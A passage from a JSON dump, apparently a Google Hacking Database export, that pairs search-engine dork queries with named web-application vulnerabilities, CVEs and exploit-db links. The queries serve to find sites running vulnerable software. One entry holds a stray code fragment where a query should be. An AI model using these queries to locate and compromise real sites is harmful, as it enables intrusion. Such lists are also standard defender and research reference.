Forum v3.0", "id": 3312}, {"short description": "\"Powered by CMS.GE\"", "long description": "Binn SBuilder (nid) Remote Blind SQL Injection Vulnerability - CVE: 2008-0253: http://www.exploit-db.com/exploits/4904", "submited": "2010-11-15", "request": "\"Powered by CMS.GE\"", "id": 3313}, {"short description": "index.php?option=com_mambads", 
"long description": "Mambo Component mambads", "submited": "2010-11-15", "request": "index.php?option=com_mambads", "id": 3314}, {"short description": "\"AlumniServer project\"", "long description": "AlumniServer 1.0.1 (Auth Bypass) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/9019", "submited": "2010-11-15", "request": "\"AlumniServer project\"", "id": 3315}, {"short description": "\"Site powered by GuppY\"", "long description": "GuppY 4.6.3 (includes.inc selskin) Remote File Inclusion Vulnerability - CVE: 2007-5844: http://www.exploit-db.com/exploits/4602", "submited": "2010-11-15", "request": "\"Site powered by GuppY\"", "id": 3316}, {"short description": "inurl:\"com_surveymanager\"", "long description": "Joomla com_surveymanager SQL injection vulnerability - CVE: 2009-3325: http://www.exploit-db.com/exploits/9721", "submited": "2010-11-15", "request": "inurl:\"com_surveymanager\"", "id": 3318}, {"short description": "Powered by PHP F1 (Max's Image Uploader)", "long description": "Max's Image Uploader Shell Upload Vulnerability - CVE: 2010-0390: http://www.exploit-db.com/exploits/11169", "submited": "2010-11-15", "request": "Powered by PHP F1 (Max's Image Uploader)", "id": 3319}, {"short description": "inurl:\"?option=com_bsadv\"", "long description": "Joomla Boy Scout Advancement 0.3 (id) SQL Injection - CVE: 2009-2290: http://www.exploit-db.com/exploits/8779", "submited": "2010-11-15", "request": "inurl:\"?option=com_bsadv\"", "id": 3320}, {"short description": "\"Powered by PHP Live! v3.3\"", "long description": "PHP Live! 3.3 (deptid) Remote SQL Injection Vulnerability - CVE: 2009-3062: http://www.exploit-db.com/exploits/9578", "submited": "2010-11-15", "request": "\"Powered by PHP Live! 
v3.3\"", "id": 3321}, {"short description": "Powered by PHP F1 (Max's Photo Album)", "long description": "Max's Photo Album Shell Upload Vulnerability: http://www.exploit-db.com/exploits/11557", "submited": "2010-11-15", "request": "Powered by PHP F1 (Max's Photo Album)", "id": 3322}, {"short description": "insite: SmarterMail Enterprise 7.1", "long description": "SmarterMail 7.1.3876 Directory Traversal Vulnerability - CVE: 2010-3486: http://www.exploit-db.com/exploits/15048", "submited": "2010-11-15", "request": "insite: SmarterMail Enterprise 7.1", "id": 3323}, {"short description": "\"Powered by LightNEasy\"", "long description": "LightNEasy 3.1.x Multiple Vulnerabilite: http://www.exploit-db.com/exploits/12322", "submited": "2010-11-15", "request": "\"Powered by LightNEasy\"", "id": 3324}, {"short description": "\"Powered by Online Grades\"", "long description": "Online Grades & Attendance 3.2.6 Multiple SQL Injection Vulnerabilities - CVE: 2009-2598: http://www.exploit-db.com/exploits/8844", "submited": "2010-11-15", "request": "\"Powered by Online Grades\"", "id": 3325}, {"short description": "\"Copyright KerviNet\"", "long description": "KerviNet Forum 1.1 Multiple Remote Vulnerabilities - CVE: 2009-2326: http://www.exploit-db.com/exploits/9068", "submited": "2010-11-15", "request": "\"Copyright KerviNet\"", "id": 3326}, {"short description": "allinurl:option=com_rsmonials", "long description": "Joomla Component rsmonials Remote Cross Site Scripting: http://www.exploit-db.com/exploits/8517", "submited": "2010-11-15", "request": "allinurl:option=com_rsmonials", "id": 3328}, {"short description": "\"Powered by F3Site\"", "long description": "F3Site 2.1 Remote Code Execution - CVE: 2007-0763: http://www.exploit-db.com/exploits/3255", "submited": "2010-11-15", "request": "\"Powered by F3Site\"", "id": 3329}, {"short description": "\"Powered by ProjectCMS\"", "long description": "ProjectCMS 1.1b Multiple Remote Vulnerabilities: 
http://www.exploit-db.com/exploits/8608", "submited": "2010-11-15", "request": "\"Powered by ProjectCMS\"", "id": 3331}, {"short description": "\"Powered by PunBB\"", "long description": "PunBB Extension Attachment 1.0.2 SQL Injection: http://www.exploit-db.com/exploits/9849", "submited": "2010-11-15", "request": "\"Powered by PunBB\"", "id": 3332}, {"short description": "\"The Merchant Project\"", "long description": "The Merchant", "submited": "2010-11-15", "request": "\"The Merchant Project\"", "id": 3334}, {"short description": "\"Developed by rbk\"", "long description": "InfiniX 1.2.003 Multiple SQL Injection Vulnerabilities - CVE: 2009-2451: http://www.exploit-db.com/exploits/8558", "submited": "2010-11-15", "request": "\"Developed by rbk\"", "id": 3335}, {"short description": "Powered by Elvin Bug Tracking Server.", "long description": "Elvin BTS 1.2.0 Multiple Remote Vulnerabilities - CVE: 2009-2123: http://www.exploit-db.com/exploits/8953", "submited": "2010-11-15", "request": "Powered by Elvin Bug Tracking Server.", "id": 3338}, {"short description": "intitle:\"Directory Listing For /\" + inurl:webdav tomcat", "long description": "Apache Tomcat (webdav) Remote File Disclosure: http://www.exploit-db.com/exploits/4552", "submited": "2010-11-15", "request": "intitle:\"Directory Listing For /\" + inurl:webdav tomcat", "id": 3339}, {"short description": "Powered By PHPFanBase", "long description": "PHPFanBase 2.x (protection.php) Remote File Include Vulnerability: http://www.exploit-db.com/exploits/2957", "submited": "2010-11-15", "request": "Powered By PHPFanBase", "id": 3340}, {"short description": "\"Powered by wpQuiz\"", "long description": "wpQuiz 2.7 Multiple Remote SQL Injection Vulnerabilities - CVE: 2007-6172: http://www.exploit-db.com/exploits/4668", "submited": "2010-11-15", "request": "\"Powered by wpQuiz\"", "id": 3341}, {"short description": "inurl:\"com_ezine\"", "long description": "Joomla / Mambo Component com_ezine v2.1 Remote File Include 
Vulnerability - CVE: 2009-4094: http://www.exploit-db.com/exploits/10178", "submited": "2010-11-15", "request": "inurl:\"com_ezine\"", "id": 3343}, {"short description": "\"Powered by ClanTiger\"", "long description": "ClanTiger 1.1.1 (Auth Bypass) SQL Injection Vulnerability: http://www.exploit-db.com/exploits/8472", "submited": "2010-11-15", "request": "\"Powered by ClanTiger\"", "id": 3346}, {"short description": "\"Search Projects\" intitle:\"The ultimate project website\"", "long description": "Softbiz Freelancers Script v.1 Remote SQL Injection - CVE: 2007-6124: http://www.exploit-db.com/exploits/4660", "submited": "2010-11-15", "request": "\"Search Projects\" intitle:\"The ultimate project website\"", "id": 3347}, {"short description": "\"Power by:RichStrong CMS\"", "long description": "RichStrong CMS (showproduct.asp cat) Remote SQL Injection - CVE: 2008-0291: http://www.exploit-db.com/exploits/4910", "submited": "2010-11-15", "request": "\"Power by:RichStrong CMS\"", "id": 3348}, {"short description": "powered:powered by CMS", "long description": "TinyMCE WYSIWYG Editor Multiple Vulnerabilities: http://www.exploit-db.com/exploits/11358", "submited": "2010-11-15", "request": "powered:powered by CMS", "id": 3350}, {"short description": "\"Powered by Grayscale Blog\"", "long description": "Grayscale Blog 0.8.0 (Security Bypass/SQL/XSS) Multiple Remote Vulns - CVE: 2007-1432: http://www.exploit-db.com/exploits/3447", "submited": "2010-11-15", "request": "\"Powered by Grayscale Blog\"", "id": 3351}, {"short description": "Powered by UCenter 1.5.0 2001 - 2008 Comsenz Inc.", "long description": "Ucenter Projekt 2.0 Insecure crossdomain (XSS) Vulnerability: http://www.exploit-db.com/exploits/12455", "submited": "2010-11-15", "request": "Powered by UCenter 1.5.0 2001 - 2008 Comsenz Inc.", "id": 3353}, {"short description": "inurl:roschedule.php", "long description": "phpScheduleIt 1.2.10 (reserve.php) Remote Code Execution - CVE: 2008-6132: 
http://www.exploit-db.com/exploits/6646", "submited": "2010-11-15", "request": "inurl:roschedule.php", "id": 3354}, {"short description": "\"PHP Project Management 0.8.10\"", "long description": "PHP Project Management 0.8.10 Multiple RFI / LFI Vulnerabilities - CVE: 2007-5641: http://www.exploit-db.com/exploits/4549", "submited": "2010-11-15", "request": "\"PHP Project Management 0.8.10\"", "id": 3355}, {"short description": "inurl:com_seyret", "long description": "Joomla Seyret Video Component (com_seyret) Blind SQL Injection: http://www.exploit-db.com/exploits/14172", "submited": "2010-11-15", "request": "inurl:com_seyret", "id": 3356}, {"short description": "\"download this free gallery at matteobinda.com\"", "long description": "ASP Photo Gallery 1.0 Multiple SQL Injection Vulnerabilities - CVE: 2008-0256: http://www.exploit-db.com/exploits/4900", "submited": "2010-11-15", "request": "\"download this free gallery at matteobinda.com\"", "id": 3359}, {"short description": "Powered by Dodo, Bubo & Misty. Feed us!", "long description": "Dodo Upload Version 1.3 Upload Shell (By pass) Vulnerability: http://www.exploit-db.com/exploits/11460", "submited": "2010-11-15", "request": "Powered by Dodo, Bubo & Misty. 
Feed us!", "id": 3361}, {"short description": "Nwahy.com 2.1 , inurl:'add-site.html'", "long description": "Nwahy Dir 2.1 Arbitrary Change Admin Password: http://www.exploit-db.com/exploits/9087", "submited": "2010-11-15", "request": "Nwahy.com 2.1 , inurl:'add-site.html'", "id": 3363}, {"short description": "inurl:index.php?option=com_jombib", "long description": "Joomla Component BibTeX 1.3 Remote Blind SQL Injection - CVE: 2007-4502: http://www.exploit-db.com/exploits/4310", "submited": "2010-11-15", "request": "inurl:index.php?option=com_jombib", "id": 3364}, {"short description": "allinurl:\"shop.htm?shopMGID=\"", "long description": "CMS Ignition SQL Injection: http://www.exploit-db.com/exploits/14471", "submited": "2010-11-15", "request": "allinurl:\"shop.htm?shopMGID=\"", "id": 3366}, {"short description": "\"By Geeklog\" \"Created this page in\" +seconds +powered inurl:public_html", "long description": "Geeklog 1.6.0sr1 Remote Arbitrary File Upload Vulnerability: http://www.exploit-db.com/exploits/9505", "submited": "2010-11-15", "request": "\"By Geeklog\" \"Created this page in\" +seconds +powered inurl:public_html", "id": 3367}, {"short description": "\"nukeai beta3\"", "long description": "PHP-Nuke NukeAI Module 3b (util.php) Remote File Include - CVE: 2006-6255: http://www.exploit-db.com/exploits/2843", "submited": "2010-11-15", "request": "\"nukeai beta3\"", "id": 3368}, {"short description": "\"Powered by UPB\"", "long description": "Ultimate PHP Board 2.0b1 (chat/login.php) Code Execution: http://www.exploit-db.com/exploits/2999", "submited": "2010-11-15", "request": "\"Powered by UPB\"", "id": 3369}, {"short description": "intitle:\"owl intranet * owl\" 0.82", "long description": "OWL Intranet Engine 0.82 (xrms_file_root) Code Execution - CVE: 2006-1149: http://www.exploit-db.com/exploits/1561", "submited": "2010-11-15", "request": "intitle:\"owl intranet * owl\" 0.82", "id": 3370}, {"short description": "Copyright 2006-2009 Insane Visions", "long 
description": "AdaptCMS Lite 1.5 Remote File Inclusion Vulnerability: http://www.exploit-db.com/exploits/10249", "submited": "2010-11-15", "request": "Copyright 2006-2009 Insane Visions", "id": 3371}, {"short description": "\"powered by JAMM\"", "long description": "JAMM CMS (id) Remote Blind SQL Injection - CVE: 2008-2755: http://www.exploit-db.com/exploits/5789", "submited": "2010-11-15", "request": "\"powered by JAMM\"", "id": 3372}, {"short description": "inurl:\"printable_pedigree.php\"", "long description": "Dog Pedigree Online Database 1.0.1b Multiple SQL Injection: http://www.exploit-db.com/exploits/8738", "submited": "2010-11-15", "request": "inurl:\"printable_pedigree.php\"", "id": 3373}, {"short description": "intext:\"Powered by Lore 1.5.6\"", "long description": "re 1.5.6 (article.php) Blind SQL Injection: http://www.exploit-db.com/exploits/7896", "submited": "2010-11-15", "request": "intext:\"Powered by Lore 1.5.6\"", "id": 3374}, {"short description": "\"powered by jmdcms.com\"", "long description": "JMD-CMS Multiple Remote Vulnerabilities: http://www.exploit-db.com/exploits/15044", "submited": "2010-11-15", "request": "\"powered by jmdcms.com\"", "id": 3375}, {"short description": "\"Driven by DokuWiki\"", "long description": "DokuWiki 2006-03-09b (dwpage.php) System Disclosure: http://www.exploit-db.com/exploits/2322", "submited": "2010-11-15", "request": "\"Driven by DokuWiki\"", "id": 3376}, {"short description": "intext:\"Powered by Pc4Uploader v9.0\"", "long description": "Pc4Uploader 9.0 Remote Blind SQL Injection Vulnerability - CVE: 2009-1742: http://www.exploit-db.com/exploits/8709", "submited": "2010-11-15", "request": "intext:\"Powered by Pc4Uploader v9.0\"", "id": 3377}, {"short description": "\"copyright 2006 Broadband Mechanics\"", "long description": "PeopleAggregator 1.2pre6-release-53 Multiple RFI Vulnerabilities - CVE: 2007-5631: http://www.exploit-db.com/exploits/4551", "submited": "2010-11-15", "request": "\"copyright 2006 
Broadband Mechanics\"", "id": 3379}, {"short description": "\"powered by shutter v0.1.1\"", "long description": "Shutter 0.1.1 Multiple Remote SQL Injection Vulnerabilities - CVE: 2009-1650: http://www.exploit-db.com/exploits/8679", "submited": "2010-11-15", "request": "\"powered by shutter v0.1.1\"", "id": 3380}, {"short description": "\"Powered by PHP Director 0.2\"", "long description": "PHP Director 0.21 (sql into outfile) eval() Injection: http://www.exploit-db.com/exploits/8181", "submited": "2010-11-15", "request": "\"Powered by PHP Director 0.2\"", "id": 3381}, {"short description": "intitle:phpinfo intext:\"php version\" +windows", "long description": "PHP 5.x COM functions safe_mode and disable_function bypass - CVE: 2007-5653: http://www.exploit-db.com/exploits/4553", "submited": "2010-11-15", "request": "intitle:phpinfo intext:\"php version\" +windows", "id": 3382}, {"short description": "\"S-CMS by matteoiamma\"", "long description": "S-CMS 2.0b3 Multiple SQL Injection Vulnerabilities: http://www.exploit-db.com/exploits/8914", "submited": "2010-11-15", "request": "\"S-CMS by matteoiamma\"", "id": 3383}, {"short description": "inurl:\"modules/articles/index.php?cat_id=\"", "long description": "XOOPS module Articles 1.03 (index.php cat_id) SQL Injection - CVE: 2007-3311: http://www.exploit-db.com/exploits/3594", "submited": "2010-11-15", "request": "inurl:\"modules/articles/index.php?cat_id=\"", "id": 3384}, {"short description": "\"by Pivot - 1.40.5\" +'Dreadwind' -pivotlog.net", "long description": "Pivot 1.40.5 Dreamwind load_template() Credentials Disclosure - CVE: 2008-3128: http://www.exploit-db.com/exploits/5973", "submited": "2010-11-15", "request": "\"by Pivot - 1.40.5\" +'Dreadwind' -pivotlog.net", "id": 3385}, {"short description": "\"PHP Easy Downloader\"", "long description": "PHP Easy Downloader 1.5 (save.php) Remote Code Execution: http://www.exploit-db.com/exploits/2812", "submited": "2010-11-15", "request": "\"PHP Easy Downloader\"", 
"id": 3386}, {"short description": "\"Powered by LoudBlog\"", "long description": "LoudBlog 0.5 (id) SQL Injection / Admin Credentials Disclosure - CVE: 2006-3832: http://www.exploit-db.com/exploits/2050", "submited": "2010-11-15", "request": "\"Powered by LoudBlog\"", "id": 3387}, {"short description": "\"Powered by visinia\"", "long description": "Visinia 1.3 Multiple Vulnerabilities - http://www.exploit-db.com/exploits/14879", "submited": "2010-11-15", "request": "\"Powered by visinia\"", "id": 3392}, {"short description": "\"Splatt Forum\"", "long description": "PHP-Nuke Module splattforum 4.0 RC1 Local File Inclusion - CVE: 2007-1633: http://www.exploit-db.com/exploits/3518", "submited": "2010-11-15", "request": "\"Splatt Forum\"", "id": 3395}, {"short description": "\"Powered by Seditio\"", "long description": "Seditio CMS 121 Remote SQL Injection - CVE: 2007-6202: http://www.exploit-db.com/exploits/4678", "submited": "2010-11-15", "request": "\"Powered by Seditio\"", "id": 3396}, {"short description": "aspWebLinks 2.0", "long description": "aspWebLinks 2.0 Remote SQL Injection / Admin Pass Change - CVE: 2006-2848: http://www.exploit-db.com/exploits/1859", "submited": "2010-11-15", "request": "aspWebLinks 2.0", "id": 3402}, {"short description": "\"Powered by Burning Board Lite 1.0.2\" or \"Powered by Burning Board 2.3.6\"", "long description": "Woltlab Burning Board 1.0.2, 2.3.6 search.php SQL Injection - CVE: 2007-0388: http://www.exploit-db.com/exploits/3143", "submited": "2010-11-15", "request": "\"Powered by Burning Board Lite 1.0.2\" or \"Powered by Burning Board 2.3.6\"", "id": 3406}, {"short description": "inurl:/webquest/soporte_derecha_w.php?", "long description": "PHP Webquest 2.5 (id_actividad) Remote SQL Injection - CVE: 2007-4920: http://www.exploit-db.com/exploits/4407", "submited": "2010-11-15", "request": "inurl:/webquest/soporte_derecha_w.php?", "id": 3407}, {"short description": "intext:\"Powered by pppblog\"", "long description": "pppBlog 
0.3.8 (randompic.php) System Disclosure - CVE: 2006-2770: http://www.exploit-db.com/exploits/1853", "submited": "2010-11-15", "request": "intext:\"Powered by pppblog\"", "id": 3410}, {"short description": "inurl:\"printable_pedigree.php\"", "long description": "Dog Pedigree Online Database 1.0.1b Insecure Cookie Handling: http://www.exploit-db.com/exploits/8739", "submited": "2010-11-15", "request": "inurl:\"printable_pedigree.php\"", "id": 3411}, {"short description": "\"Powered by LifeType\" \"RSS 0.90\" \"RSS 1.0\" \"RSS 2.0\" \"Valid XHTML 1.0 Strict and CSS\"", "long description": "LifeType 1.0.4 SQL Injection / Admin Credentials Disclosure - CVE: 2006-2857: http://www.exploit-db.com/exploits/1874", "submited": "2010-11-15", "request": "\"Powered by LifeType\" \"RSS 0.90\" \"RSS 1.0\" \"RSS 2.0\" \"Valid XHTML 1.0 Strict and CSS\"", "id": 3415}, {"short description": "\"Powered by Leap\"", "long description": "Leap CMS 0.1.4 (SQL/XSS/SU) Multiple Remote Vulnerabilities - CVE: 2009-1615: http://www.exploit-db.com/exploits/8577", "submited": "2010-11-15", "request": "\"Powered by Leap\"", "id": 3416}, {"short description": "inurl:pmwiki.php +\"Page last modified on\" | PmWikiPhilosophy", "long description": "PmWiki", "submited": "2010-11-15", "request": "inurl:pmwiki.php +\"Page last modified on\" | PmWikiPhilosophy", "id": 3417}, {"short description": "\"Powered by UPB\"", "long description": "Ultimate PHP Board 2.0 (header_simple.php) File Include - CVE: 2006-7169: http://www.exploit-db.com/exploits/2721", "submited": "2010-11-15", "request": "\"Powered by UPB\"", "id": 3418}, {"short description": "\"BioScripts\"", "long description": "MiniTwitter 0.2b Remote User Options Change - CVE: 2009-2574: http://www.exploit-db.com/exploits/8587", "submited": "2010-11-15", "request": "\"BioScripts\"", "id": 3420}, {"short description": "\"Powered by Claroline\" -demo", "long description": "Claroline", "submited": "2010-11-15", "request": "\"Powered by Claroline\" 
-demo", "id": 3421}, {"short description": "\"Galerie 3.2 2004 by progressive\"", "long description": "Galerie 3.2 (pic) WBB Lite Addon Blind SQL Injection - CVE: 2008-4516: http://www.exploit-db.com/exploits/6675", "submited": "2010-11-15", "request": "\"Galerie 3.2 2004 by progressive\"", "id": 3422}, {"short description": "inurl:sysinfo.cgi ext:cgi", "long description": "SysInfo 1.21 (sysinfo.cgi) Remote Command Execution - CVE: 2006-1831: http://www.exploit-db.com/exploits/1677", "submited": "2010-11-15", "request": "inurl:sysinfo.cgi ext:cgi", "id": 3423}, {"short description": "\"Powered by Burning Board\" -exploit -johnny", "long description": "Woltlab Burning Board Lite 1.0.2pl3e (pms.php) SQL Injection - CVE: 2007-0812: http://www.exploit-db.com/exploits/3262", "submited": "2010-11-15", "request": "\"Powered by Burning Board\" -exploit -johnny", "id": 3424}, {"short description": "\"Welcome to Exponent CMS\" | \"my new exponent site\"", "long description": "Exponent CMS 0.96.3 (view) Remote Command Execution - CVE: 2006-4963: http://www.exploit-db.com/exploits/2391", "submited": "2010-11-15", "request": "\"Welcome to Exponent CMS\" | \"my new exponent site\"", "id": 3425}, {"short description": "\"Powered by PMOS Help Desk\"", "long description": "PMOS Help Desk 2.4 Remote Command Execution - CVE: 2007-6550: http://www.exploit-db.com/exploits/4789", "submited": "2010-11-15", "request": "\"Powered by PMOS Help Desk\"", "id": 3426}, {"short description": "\"Powered By Pligg\" + \"Legal: License and Source\"", "long description": "Pligg 9.9.0 Remote Code Execution - CVE: 2008-7091: http://www.exploit-db.com/exploits/6172", "submited": "2010-11-15", "request": "\"Powered By Pligg\" + \"Legal: License and Source\"", "id": 3427}, {"short description": "Powered.by.RaidenHTTPD +intitle:index.of | inurl:raidenhttpd-admin", "long description": "RaidenHTTPD 1.1.49 (SoftParserFileXml) Remote Code Execution - CVE: 2006-4723: http://www.exploit-db.com/exploits/2328", 
"submited": "2010-11-15", "request": "Powered.by.RaidenHTTPD +intitle:index.of | inurl:raidenhttpd-admin", "id": 3429}, {"short description": "Site powered By Limbo CMS", "long description": "Limbo CMS 1.0.4.2 Cuid cookie Blind SQL Injection - CVE: 2008-0734: http://www.exploit-db.com/exploits/5088", "submited": "2010-11-15", "request": "Site powered By Limbo CMS", "id": 3431}, {"short description": "inurl:naviid + inurl:liste9", "long description": "Aiyoota! CMS - Blind SQL Injection: http://www.exploit-db.com/exploits/7490", "submited": "2010-11-15", "request": "inurl:naviid + inurl:liste9", "id": 3432}, {"short description": "\"POWERED BY PHPNUKE.IR\"", "long description": "PHPnuke 8.2 Remote Upload File: http://www.exploit-db.com/exploits/14058", "submited": "2010-11-15", "request": "\"POWERED BY PHPNUKE.IR\"", "id": 3433}, {"short description": "inurl:\"com_gcalendar\"", "long description": "Joomla Component com_gcalendar 1.1.2 (gcid) Remote SQL Injection Vulnerability - CVE: 2009-4099: http://www.exploit-db.com/exploits/10232", "submited": "2010-11-15", "request": "inurl:\"com_gcalendar\"", "id": 3434}, {"short description": "\"toendaCMS is Free Software released under the GNU/GPL License.\" | \"powered by toendaCMS\" -inurl:demo", "long description": "toendaCMS 1.0.0 (FCKeditor) Remote File Upload: http://www.exploit-db.com/exploits/2035", "submited": "2010-11-15", "request": "\"toendaCMS is Free Software released under the GNU/GPL License.\" | \"powered by toendaCMS\" -inurl:demo", "id": 3437}, {"short description": "Powered by WikyBlog", "long description": "WikyBlog v1.7.3rc2 Multiple Vulnerabilities - CVE: 2010-0754: http://www.exploit-db.com/exploits/11560", "submited": "2010-11-15", "request": "Powered by WikyBlog", "id": 3438}, {"short description": "\"powered by yourtube\"", "long description": "YourTube 2.0 Arbitrary Database Disclosure: http://www.exploit-db.com/exploits/9073", "submited": "2010-11-15", "request": "\"powered by yourtube\"", "id": 
3439}, {"short description": "\"Powered by cpCommerce\"", "long description": "cpCommerce", "submited": "2010-11-15", "request": "\"Powered by cpCommerce\"", "id": 3440}, {"short description": "\"propuls par JBlog\"", "long description": "JBlog 1.0 Create / Delete Admin Authentication Bypass - CVE: 2007-3973: http://www.exploit-db.com/exploits/4211", "submited": "2010-11-15", "request": "\"propuls par JBlog\"", "id": 3443}, {"short description": "FhImage, powered by Flash-here.com", "long description": "Fhimage 1.2.1 Remote Index Change: http://www.exploit-db.com/exploits/7820", "submited": "2010-11-15", "request": "FhImage, powered by Flash-here.com", "id": 3444}, {"short description": "\"Powered by: Arab Portal v2\"", "long description": "Arab Portal v2.x (forum.php qc) Remote SQL Injection - CVE: 2009-2781: http://www.exploit-db.com/exploits/9320", "submited": "2010-11-15", "request": "\"Powered by: Arab Portal v2\"", "id": 3445}, {"short description": "\"Powered by PHP iCalendar\"", "long description": "PHP iCalendar 2.24 (cookie_language) LFI / File Upload - CVE: 2008-5967: http://www.exploit-db.com/exploits/6519", "submited": "2010-11-15", "request": "\"Powered by PHP iCalendar\"", "id": 3446}, {"short description": "POWERED BY ALITALK", "long description": "ALITALK 1.9.1.1 Multiple Remote Vulnerabilities - CVE: 2008-0371: http://www.exploit-db.com/exploits/4922", "submited": "2010-11-15", "request": "POWERED BY ALITALK", "id": 3447}, {"short description": "Copyright 2010. Software Index", "long description": "Software Index (Remote File Upload) Exploit: http://www.exploit-db.com/exploits/13999", "submited": "2010-11-15", "request": "Copyright 2010. 
Software Index", "id": 3449}, {"short description": "\"Powered by MDForum\"", "long description": "MDForum 2.0.1 (PNSVlang) Remote Code Execution - CVE: 2006-6869: http://www.exploit-db.com/exploits/3057", "submited": "2010-11-15", "request": "\"Powered by MDForum\"", "id": 3451}, {"short description": "\"Help * Contact * Imprint * Sitemap\" | \"powered by papoo\" | \"powered by cms papoo\"", "long description": "PAPOO 3_RC3 SQL Injection/Admin Credentials Disclosure - CVE: 2006-3571: http://www.exploit-db.com/exploits/1993", "submited": "2010-11-15", "request": "\"Help * Contact * Imprint * Sitemap\" | \"powered by papoo\" | \"powered by cms papoo\"", "id": 3452}, {"short description": "\"Powered by mojoPortal\"", "long description": "mojoportal Multiple Remote Vulnerabilities - CVE: 2010-3602: http://www.exploit-db.com/exploits/15018", "submited": "2010-11-15", "request": "\"Powered by mojoPortal\"", "id": 3453}, {"short description": "intitle:\"login to cacti\"", "long description": "Cacti 0.8.6i (copy_cacti_user.php) SQL Injection: http://www.exploit-db.com/exploits/3045", "submited": "2010-11-15", "request": "intitle:\"login to cacti\"", "id": 3454}, {"short description": "\"BioScripts\"", "long description": "MiniTwitter 0.3-Beta (SQL/XSS) Multiple Remote Vulnerabilities: http://www.exploit-db.com/exploits/8778", "submited": "2010-11-15", "request": "\"BioScripts\"", "id": 3455}, {"short description": "\"Powered by PHP Advanced Transfer Manager v1.30\"", "long description": "PHP Advanced Transfer Manager 1.30 Source Code Disclosure: http://www.exploit-db.com/exploits/2968", "submited": "2010-11-15", "request": "\"Powered by PHP Advanced Transfer Manager v1.30\"", "id": 3459}, {"short description": "Small Business Manager", "long description": "Plesk Small Business Manager 10.2.0 and Site Editor Multiple Vulnerabilities: http://www.exploit-db.com/exploits/15313", "submited": "2010-11-15", "request": "Small Business Manager", "id": 3461}, {"short description": 
"\"Powered by webSPELL\"", "long description": "webSPELL 4.2.0c Bypass BBCode XSS Cookie Stealing Vulnerability - CVE: 2009-1408: http://www.exploit-db.com/exploits/8453", "submited": "2010-11-15", "request": "\"Powered by webSPELL\"", "id": 3462}, {"short description": "\"Help * Contact * Imprint * Sitemap\" | \"powered by papoo\" | \"powered by cms papoo\"", "long description": "Papoo 3.02 (kontakt menuid) Remote SQL Injection - CVE: 2007-2320: http://www.exploit-db.com/exploits/3739", "submited": "2010-11-15", "request": "\"Help * Contact * Imprint * Sitemap\" | \"powered by papoo\" | \"powered by cms papoo\"", "id": 3463}, {"short description": "\"Powered by IMGallery\"", "long description": "IMGallery 2.5 Create Uploader Script - CVE: 2007-0082: http://www.exploit-db.com/exploits/3049", "submited": "2010-11-15", "request": "\"Powered by IMGallery\"", "id": 3464}, {"short description": "intext:\"Powered by Plogger!\" -plogger.org", "long description": "Plogger Beta 2.1 Administrative Credentials Disclosure: http://www.exploit-db.com/exploits/1621", "submited": "2010-11-15", "request": "intext:\"Powered by Plogger!\" -plogger.org", "id": 3465}, {"short description": "\"Powered by FreeWebshop.org 2.2.1\"", "long description": "FreeWebshop 2.2.1 Remote Blind SQL Injection - CVE: 2007-6466: http://www.exploit-db.com/exploits/4740", "submited": "2010-11-15", "request": "\"Powered by FreeWebshop.org 2.2.1\"", "id": 3466}, {"short description": "\"powered by XHP CMS\"", "long description": "XHP CMS 0.5 (upload) Remote Command Execution - CVE: 2006-1371: http://www.exploit-db.com/exploits/1605", "submited": "2010-11-15", "request": "\"powered by XHP CMS\"", "id": 3467}, {"short description": "\"100% | 50% | 25%\" \"Back to gallery\" inurl:\"show.php?imageid=\"", "long description": "Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection - CVE: 2008-6988: http://www.exploit-db.com/exploits/6428", "submited": "2010-11-15", "request": "\"100% | 50% | 25%\" \"Back to gallery\" 
inurl:\"show.php?imageid=\"", "id": 3468}, {"short description": "Portal By vbPortal Version 3.5.0", "long description": "vbPortal 3.0.2 3.6.0 b1 (cookie) Remote Code Excution - CVE: 2006-4004: http://www.exploit-db.com/exploits/2087", "submited": "2010-11-15", "request": "Portal By vbPortal Version 3.5.0", "id": 3469}, {"short description": ": inurll ', -font => '{Verdana} 8 bold') ->pack ( -side => \"top\" , -anchor => 'e' ) ;", "long description": "http://www.exploit-db.com/exploits/3759", "submited": "2010-11-15", "request": "", "id": 3471}, {"short description": "\"Copyright @2007 Iatek LLC\"", "long description": "PortalApp 4.0 (SQL/XSS/Auth Bypasses) Multiple Remote Vulnerabilities - CVE: 2008-4612: http://www.exploit-db.com/exploits/4848", "submited": "2010-11-15", "request": "\"Copyright @2007 Iatek LLC\"", "id": 3472}, {"short description": "\"& Spider Friendly by Crack\"", "long description": "phpBB Spider Friendly Module 1.3.10 File Include - CVE: 2006-5665: http://www.exploit-db.com/exploits/2686", "submited": "2010-11-15", "request": "\"& Spider Friendly by Crack\"", "id": 3473}, {"short description": "intitle:\"login to cacti\"", "long description": "Cacti 0.8.6i cmd.php popen() Remote Injection: http://www.exploit-db.com/exploits/3029", "submited": "2010-11-15", "request": "intitle:\"login to cacti\"", "id": 3474}, {"short description": "Welcome to your PHPOpenChat-Installation!", "long description": "ADODB 4.70 (PhpOpenChat 3.0.x) Server.php SQL Injection: http://www.exploit-db.com/exploits/1652", "submited": "2010-11-15", "request": "Welcome to your PHPOpenChat-Installation!", "id": 3475}, {"short description": "\"powered by TSEP - The Search Engine Project\"", "long description": "TSEP 0.942.02 Multiple Remote Vulnerabilities: http://www.exploit-db.com/exploits/9057", "submited": "2010-11-15", "request": "\"powered by TSEP - The Search Engine Project\"", "id": 3476}, {"short description": "WEBalbum 2004-2006 duda", "long description": "WebAlbum 
2.02pl COOKIE[skin2] Remote Code Execution - CVE: 2006-1480: http://www.exploit-db.com/exploits/1608", "submited": "2010-11-15", "request": "WEBalbum 2004-2006 duda", "id": 3477}, {"short description": "\"Powered by PHP-Update\" -site:www.php-update.co.uk", "long description": "PHP-Update", "submited": "2010-11-15", "request": "\"Powered by PHP-Update\" -site:www.php-update.co.uk", "id": 3478}, {"short description": "\"Powered by Zomplog\"", "long description": "Zomplog 3.8.1 upload_files.php Arbitrary File Upload - CVE: 2007-5230: http://www.exploit-db.com/exploits/4466", "submited": "2010-11-15", "request": "\"Powered by Zomplog\"", "id": 3480}, {"short description": "intext:\"Powered by simplog\"", "long description": "Simplog 0.9.2 (s) Remote Commands Execution - CVE: 2006-0146: http://www.exploit-db.com/exploits/1663", "submited": "2010-11-15", "request": "intext:\"Powered by simplog\"", "id": 3481}, {"short description": "\"Powered by SMF\"", "long description": "Simple Machines Forum 1.1 rc2 local inclusion: http://www.exploit-db.com/exploits/2231", "submited": "2010-11-15", "request": "\"Powered by SMF\"", "id": 3482}, {"short description": "inurl:php-stats.js.php", "long description": 